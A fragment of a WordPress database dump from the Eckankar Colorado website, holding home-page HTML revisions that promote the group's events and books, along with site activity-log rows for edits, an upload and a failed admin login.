<br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(236802,40260,'post_title','Home'),(236803,40260,'post_prev_post_content','<div>\r\n<p class=\"mod-reset\"><img class=\"aligncenter size-full wp-image-269192\" style=\"margin-top: -101px; position: absolute; z-index: 1;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/10/wave-white-2.png\" alt=\"\" width=\"1920\" height=\"165\"></p>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -245px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(236800,40260,'post_id','7160'),(236801,40260,'post_type','page'),(236799,40259,'_server_http_referer','https://eckankar-colorado.org/wp-admin/media-new.php'),(236798,40259,'_server_remote_addr','76.130.120.x'),(236795,40259,'_user_id','2'),(236796,40259,'_user_login','S8zhaBda'),(236797,40259,'_user_email','nada@zipnadanot.org'),(236792,40259,'attachment_mime','image/png'),(236793,40259,'attachment_filesize','19778'),(236794,40259,'_message_key','attachment_created'),(236791,40259,'attachment_filename','wave-white-2-300-height.png'),(236790,40259,'attachment_title','wave-white-2-300-height'),(236789,40259,'attachment_id','269276'),(236788,40259,'post_type','attachment'),(236787,40258,'_server_remote_addr','20.168.8.x'),(236786,40258,'_message_key','user_unknown_login_failed'),(236785,40258,'server_http_user_agent','Mozilla/5.0'),(236784,40258,'failed_username','admin'),(236782,40257,'_server_remote_addr','76.130.120.x'),(236783,40257,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(236781,40257,'_user_email','nada@zipnadanot.org'),(236780,40257,'_user_login','S8zhaBda'),(236778,40257,'_message_key','post_updated'),(236779,40257,'_user_id','2'),(236777,40257,'post_new_post_content','<div>\r\n<p class=\"mod-reset\"><img class=\"aligncenter size-full wp-image-269192\" style=\"margin-top: -101px; position: absolute; z-index: 1;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/10/wave-white-2.png\" alt=\"\" width=\"1920\" height=\"165\"></p>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -245px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; 